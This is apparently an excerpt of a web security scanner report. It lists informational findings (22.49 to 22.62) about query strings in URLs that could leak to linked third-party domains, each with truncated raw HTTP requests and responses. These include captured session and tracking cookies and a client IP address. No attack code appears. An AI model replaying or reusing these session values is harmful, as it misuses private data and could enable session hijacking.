Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&js=no" width="1" height="1" alt="" /></div>
...[SNIP]...

22.49. http://www.depthsecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.depthsecurity.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.depthsecurity.com/?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ

The response contains the following link to another domain:

http://depthsecurity.blogspot.com/

Request

GET /?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303732840.1.1.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303732840.1; __utmc=5781286

Response

22.50. http://www.eset.com/us/business/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/products

Issue detail

The page was loaded from a URL containing a query string:

http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0
http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
http://www.facebook.com/esetusa
http://www.twitter.com/eset
http://www.youtube.com/user/esetusa
https://checkout.netsuite.com/c.438708/Return_Policy.html

Request

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:52:44 GMT
X-Varnish: 1310965243
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<li><a href="http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T" class="header_cart" onclick="_hbLink('Header Nav Cart');">Cart 
...[SNIP]...
<li><a href="https://checkout.netsuite.com/c.438708/Return_Policy.html" onclick="window.open(this.href);return false;">Return Policy</a>
...[SNIP]...
<div class="social_media_icons">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</fb:like>
<a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/facebook_icon.gif" alt="Visit ESET on Facebook" /></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/us/images/social/twitter_icon.gif" alt="Follow ESET on Twitter" /></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/youtube_icon.gif" alt="ESET YouTube Channel" />
...[SNIP]...
<div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.51. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css

Request

Response

22.52. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=4&ved=0CC0QFjAD&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D523%26pg%3D373%26h%3D0%26hp%3D373&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNHcoCcsIqeas7ROQLotiEACsj1yhA

The response contains the following link to another domain:

http://learn.shavlik.com/shavlik/index.cfm?m=523&pg=373&h=0&hp=373

Request

GET /url?sa=t&source=web&cd=4&ved=0CC0QFjAD&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D523%26pg%3D373%26h%3D0%26hp%3D373&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNHcoCcsIqeas7ROQLotiEACsj1yhA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=523&pg=373&h=0&hp=373
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:24 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=523&pg=373&h=0&hp=373">here</A>
...[SNIP]...

22.53. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CCEQFjAB&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fpg%3D363&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNE-SEZeBLTzqftyF712qYqdlDQNBQ

The response contains the following link to another domain:

http://learn.shavlik.com/shavlik/index.cfm?pg=363

Request

GET /url?sa=t&source=web&cd=2&ved=0CCEQFjAB&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fpg%3D363&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNE-SEZeBLTzqftyF712qYqdlDQNBQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?pg=363
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:27 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?pg=363">here</A>
...[SNIP]...

22.54. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=3&ved=0CCcQFjAC&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D521%26pg%3D372%26h%3D0%26hp%3D372&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNFY-jnfFXDANGn53BN5aNJep4PgYQ

The response contains the following link to another domain:

http://learn.shavlik.com/shavlik/index.cfm?m=521&pg=372&h=0&hp=372

Request

GET /url?sa=t&source=web&cd=3&ved=0CCcQFjAC&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D521%26pg%3D372%26h%3D0%26hp%3D372&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNFY-jnfFXDANGn53BN5aNJep4PgYQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=521&pg=372&h=0&hp=372
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:21 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=521&pg=372&h=0&hp=372">here</A>
...[SNIP]...

22.55. http://www.googleadservices.com/pagead/conversion/1072501689/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:

http://www.googleadservices.com/pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html

The response contains the following link to another domain:

https://services.google.com/sitestats/en.html?cid=1072501689

Request

Response

22.56. http://www.iveco-ptc.spb.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iveco-ptc.spb.ru
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.iveco-ptc.spb.ru/?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU

The response contains the following links to other domains:

http://mc.yandex.ru/metrika/watch.js
http://mc.yandex.ru/watch/157241
http://www.nh-ptc.ru/

Request

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<li class=""><a href="http://www.nh-ptc.ru/" class="" target="_blank">........................ ..............</a>
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...
<div><img src="//mc.yandex.ru/watch/157241"
style="position:absolute; left:-9999px;" alt="" /></div>
...[SNIP]...

22.57. http://www.manageengine.com/products/security-manager/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/

Issue detail

The page was loaded from a URL containing a query string:

http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw

The response contains the following links to other domains:

http://demo.securitymanagerplus.com/
http://www.google-analytics.com/ga.js
http://www.site24x7.com/
http://www.webnms.com/
http://www.zohocorp.com/

Request

GET /products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.2.10.1303732848
If-None-Match: "d3ec-49f24fc659f40"
If-Modified-Since: Wed, 23 Mar 2011 11:51:49 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:11:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.58. http://www.manageengine.com/products/security-manager/download.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/download.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.manageengine.com/products/security-manager/download.html?features

The response contains the following links to other domains:

http://demo.securitymanagerplus.com/
http://flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js
http://flex.atdmt.com/mstag/tag/b060e217-431e-47e2-b8f7-c11fe85e301e/conversion.html?cp=5050&dedup=1
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1072501689/?value=1&label=pageview&script=0
http://www.site24x7.com/
http://www.webnms.com/
http://www.zohocorp.com/

Request

GET /products/security-manager/download.html?features HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:28:00 GMT
ETag: "15369-4a1bba9688c00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 86889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.59. http://www.outpost24.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outpost24.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.outpost24.com/?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg

The response contains the following links to other domains:

http://cve.mitre.org/
http://static.woopra.com/js/woopra.js
http://www.google-analytics.com/urchin.js
https://www.pcisecuritystandards.org/

Request

GET /?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjEmMSYyNDI5MzYmMTMwMzczMjgxODc3OCYxMzAzNzMzMDYxNjk3JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:27 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 12630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...
<div><a href="http://cve.mitre.org" target="_blank"><img src="/images/cve_small.png" alt="CVE" id="PageCveLogo" border="0" />
...[SNIP]...
<div><a href="https://www.pcisecuritystandards.org" target="_blank"><img src="/images/pci_ssc_asv.jpg" alt="PCI" id="PagePciLogo" border="0" />
...[SNIP]...

22.60. http://www.praetorian.com/external-network-penetration-test.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.praetorian.com
Path:	/external-network-penetration-test.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://feeds.feedburner.com/PraetorianLabs
http://www.facebook.com/praetorianlabs
http://www.linkedin.com/companies/praetorian
http://www.twitter.com/praetorianlabs

Request

GET /external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303732836.1.1.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303732836.1; __utmc=116139463

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:37 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13262
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
<noscript>
                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="647" height="295" id="currentnews" align="middle">
                       <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</h4>
               <a href="http://www.twitter.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/twitter.png" height="32" width="32" border="0" alt="twitter" />
...[SNIP]...
</a>
               <a href="http://www.facebook.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/facebook.png" height="32" width="32" border="0" alt="facebook" />
...[SNIP]...
</a>
               <a href="http://www.linkedin.com/companies/praetorian" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/linkedin.png" height="32" width="32" border="0" alt="linkedin" />
...[SNIP]...
</a>
               <a href="http://feeds.feedburner.com/PraetorianLabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/rss.png" height="32" width="32" border="0" alt="rss" />
...[SNIP]...

22.61. http://www.smpone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://twitter.com/smpflash
http://www.facebook.com/pages/Security-Management-Partners/152915868089107
http://www.tresware.com/

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="500" height="380" id="homeshow" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="242" height="230" id="menu_right" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<td valign="bottom"><a href="http://www.facebook.com/pages/Security-Management-Partners/152915868089107"><img src="images/uploads/facebook.png" border="0" alt="facebook" /></a><a href="http://twitter.com/smpflash"><img src="images/uploads/TwitterIcon.png" border="0" alt="twitter" />
...[SNIP]...
<td><a href="http://www.tresware.com/" target="_blank"><img src="images/tresware.gif" border="0" alt="Tresware" width="95" height="16" />
...[SNIP]...

22.62. http://www.stillsecure.com/m/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stillsecure.com/m/?c=request-a-trial&product=VAM

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://partner.protectpoint.net/
http://www.thesecuritysamurai.com/
https://radar.protectpoint.com/usermanager/login.php

Request

GET /m/?c=request-a-trial&product=VAM HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/vam/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
